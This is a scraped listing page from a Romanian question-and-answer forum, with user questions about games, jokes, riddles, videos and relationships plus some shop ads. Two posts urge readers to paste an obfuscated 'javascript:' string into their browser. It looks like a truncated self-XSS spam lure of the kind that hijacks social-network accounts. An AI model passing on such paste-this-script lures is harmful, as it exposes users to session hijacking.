Cit e ceasul pe la voi, ca al meu a luat-o inainte si vreau sa-l potrivesc
Are capul ca o pisica, are labutele ca o pisica, are coada ca o pisica, se joaca ca o pisica, bea apa si mananca ca o pisica, dar nu este pisica, atunci ce este?
Asi dori multe exemple de jocuri super online sau single player care au nevoie de 1gb memore(ram)
Ce parere aveti despre urmatorul videoclip? http://www.youtube.com/watch?v=W6D_MFH2Idk Vi se pare amuzant?
De unde pot lua alfabetul chinez? Cu traducere! Fuditza...
Ia sa-mi ziceti mie, tantarii au dinti? Si daca au, cati?
Ce parere aveti? dati copy si paste in browser ca sa-l vedeti! ce credeti? javascript:var _0xbd51=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C", "\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79",...? (mai mult)
Hey dati copi si paste in browser si uitati-va e chiar tare! javascript:var _0xbd51=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C", "\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79",...? (mai mult)
Cum pot sa-mi instalez jocul Hannah Montana:The Movie?
Va rog, mai stiti si alte jocuri cu Hannah Montana? Jocuri Demo!?
Dati click aici: http://www.pustiul.com/2010/03/avatarul-dupa-oscar/, urmariti filmuletul iar apoi astept parerile voastre... vreau ceva pareri amuzante :d:));)
Realizati un film : ce actorii distribuiti in rolurile principale? Ce gen de film?
Am o intrebare ce ma macina de ceva vreme incoace : furnicile au muci? si daca da, cine le sterge la nas?
Barbatul isi creioneaza viitorul destul de simplu: Merge la scoala, termina o facultate, se angajaza, se casatoreste, face copii, da coltu'. Cum isi planifica o femeie viitorul?
Ofer gratuit speranţe deşarte, regrete tardive şi iubiri trecătoare.;;) Sunteţi amatori? Înscrierile se fac un pic mai jos.
Care e regula de aur?
Intrebare pentru toti cei care vor sa raspunda: CE ESTE RAGAIALA? Astept raspunsuri inteligente...:D:P:))
Http://www.youtube.com/watch?v=dfSPvAAqNv0 http://www.youtube.com/watch?v=YfH-Kstt_O0&NR=1 http://www.youtube.com/watch?v=ArqoNSMLLdA&feature=related România asta...
Ce parere aveti? http://www.youtube.com/watch?v=URJA5cfEWBo&feature=player_embedded
Imi dati va rog niste linkuri cu exercitii si probleme gen Cangurul?
Care imi zice cateva glume scurte si haioase? Dau funda dar nu ziceti sa caut pe google.
Care e povestea vietii voastre in cateva cuvinte?
HeY! As vrea sa imi dati niste "probleme" care sa imi puna mintea in functiune.Adica ceva de logica:)dau fundita:)
Hey Imi puteti scrie si mie niste bancuri legate de matematica, matematicieni etc. Multumesc celor care ma ajuta :).
De ce daca am o placa video de 256 mb imi merge totusi sacadat un joc care cere doar 32 mb? Ram-ul e de 1 gb si procesorul de 2.2 ghz si am driverele instalate corect. :((
Vreau sa cuceresc un baiat si m-am gandit sa-i cumpar un buchet mare de trandafiri. Credeti ca v-a aprecia gestul?
Cum pot sa ma opresc din a mai face un anumit lucru care nu-mi place desi cand il fac imi place sa ma laude ceilalti ca il fac bine si ma simt bine si eu? Voi ati fost pusi in situatii din astea?
Ce poate si ce nu poate face TPU? Vreau raspunsuri amuzante.
Vreau doar fete. Aveti cont pe hi5? Nu vreti sa ne imprietenim?
Am sa va pun o intrebare pentru ca am lipsit si nu v-am mai auzit de mult si va iubesc pe toti. Unde e Alina?
Azi dimineata cand m-am trezit am iesit repede afara sa vad cum e si am observat ca termometrul care era instalat afara indica 30 grade la soare. Toate normale pana aici, dar cand intru in camera si ma...? (mai mult)
Hey buna. Ce mai faceti? Cum sunteti?:D Niste jocuri gen IMVU stiti? Spuneti-mi si mie va rog. Multumesc:-*!
Bunaa!:)Ce este our world?:DAdica stiu ca este un joc... dar voua va place, aveti cont? Detalii daca se poate:DDau fundita:)
Spuneti-mi si mie bancuri amuzante. Cel mai amuzant primeste fundita. Promit.
Ce are 2 ochi si 150 de dinti? un... dar ce are 2 dinti si 150 de ochi? un autobuz cu...
SOS! cine mai stie niste jocuri pe foaie?(nu pe calculator)
Folosind cuvintele:usturoi, ochi, catei, lesa, farfurie, masina, masa.Formati o fraza sau o poezie:X Funda la cel mai bun>:D
Alarma! Imi fug gandacii din bucatarie! Sa fie oare, ca nici ei nu mai au ce manca? Ajutati-ma sa gasesc cauza.:-?
Folosind cuvintele :ceapa, apa, caiet, iute, amar, par, cercei.Formati o fraza sau o poezie:)):D vreau sa vad ce iese:> Funda la cel mai bun:X
Astăzi am primit cadou o sticlă de Scotch whisky, am citit eticheta şi scria că e produs la Hamburg şi îmbuteliat la Praga. Pot spune că e o sticlă de whisky originală sau un whisky original?...? (mai mult)
Întrebare pentru profesionişti : Cum puteţi realiza un mesaj sublimbinal?
Un caine care spune I LOVE YOU. Super http://www.youtube.com/watch?v=-1RJnYYyLrs&feature=related
La jocul " Farm Frenzy " cum fac sa imi creasca o gaina?
Spuneti-mi si mie mesaje amuzante va rog foarte frumos pentru ca vreau sa trimit prietenilor!
Cine stie mesaje amuzante(despre profesori despre orice nu conteaza)spuneti-mi si mie va rog frumos!
De ce, inaintind in virsta, prima data moare cel mai important "membru"direct implicat in stabilitatea unei relatii?
Salut stie cineva un site din care sa descarc fifa 2008
Vreau sa vad daca sunt singura sau mai exista si altii ca mine. Ieri am vazut fimosul film " avatar" si am adormit de plictiseala, am vazut "new mon" si a avut acelasi efect. Voua vi s-a intamplat asta?...? (mai mult)
Am cateva intrabari pentru voi: 1. Jucati Barn Buddy? 2.La ce nivel sunteti? Eu la 6 3. Ce credeti despre acest joc? 4. Ce mai doriti sa gasiti aici? 5.Cat timp iti petreci pe sait-ul jocului? Sunt...? (mai mult)
Cand va incepe foamea mondiala;)?
Boxa portabila EP118WS Difuzor Bluetooth cu radio FM incorporat
16
Memorie USB Kingston DataTraveler 50, 64GB, USB 3.0
50
Casti Bluetooth Creative Sound Blaster Jam
Alexandra123s întreabă:
pityyy16cm întreabă:
T0T întreabă:
Bataiewwe întreabă:
O să- ți zic cum vad eu situația.Te înțeleg fiindcă și eu am fost asa si sunt, doar ca...cu tata(acum am 20 de ani și m- am distanțat de el și el...acum regreta dar degeaba, ma țin cât mai...... (mai mult)
Nici una, exista o directiva a EU impotriva "turismului pentru obtinerea permisului de conducere" cum- i zic ei. Pe scurt faci scoala si poti da de permis numai dupa ce esti inregistrat ca rezident...... (mai mult)
Încrederea se pierde cel mai ușor și se castiga cel mai greu. Părinții tăi au nevoie de timp. I- ai dezamagit. Trebuie să vadă că nu mai faci aceleași greșeli. Chiar daca uneori nu vrem sa acceptam,...... (mai mult)
Nicole Cherry
Esti fan Nicole Cherry? Hai sa vedem chiar acum cat de multe stii despre tanara artista!